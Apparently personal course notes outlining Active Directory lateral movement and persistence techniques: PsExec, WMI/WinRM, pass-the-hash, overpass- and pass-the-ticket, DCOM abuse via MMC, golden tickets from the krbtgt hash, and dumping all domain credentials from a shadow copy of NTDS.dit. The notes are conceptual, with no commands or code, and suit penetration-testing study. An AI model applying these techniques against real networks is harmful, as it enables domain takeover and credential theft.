Content
Using password hases or kerberos tickets to authenticate to other machines in the AD
WMI and WinRM
used for remote management
can only be used by local admins on target
PsExec
provide remote execution of processes on other systems
conditions:
ADMIN$ share must be available
File and Printer sharing must be turnted on
how does it work:
writing psexesvc into C:
creates and spawns a service on remote host
runs requested command as child of psexesvc
Pass the hash
multip tools support specification of the NTLM hash instead of the password
->passing the hash to gain access
Overpass the hash
turn NTLM hash into a kerberos TGT ticket, which then allows us to authenticate against different services
can be done in mimikatz
Pass the ticket
TGT can only be used from the machine it was created on
TGS can be used from other sessions: Pass the ticket
if the TGS belongs to the current user, we do not need admin privs
Example:
dave has access to smb folder BACKUP and has an open session
jen cant access BACKUP
DCOM
“Distributed Component Object Model”
system to create distributed software components that interact with each other
uses RPC, requries local admin
DCOM lateral movement via MMC
MMC is a DCOM application for scripted automations
Can be used for lateral movement
exploits the ExecuteShellCommand functionality
AD persistence
golden tickets
shadow copies
Golden Tickets
TGT signed with pw hash of krbtgt account
Knowing the pw hash of krbtg
we can generate arbitrary TGTs
This gives us access to arbirtrary services in the domain
E.g. a ticket, which states that a unprivileged user is part of the domain admins group
Shadow Copy
backup technology that allows creation of snapshots of files or entire volumes
vshadow.exe
attack:
as domain admin, we can extract a shadow copy of NTDS.dit (AD database)
with this copy, we can extract all user credentials on our local kali
Zuletzt geändertvor einem Jahr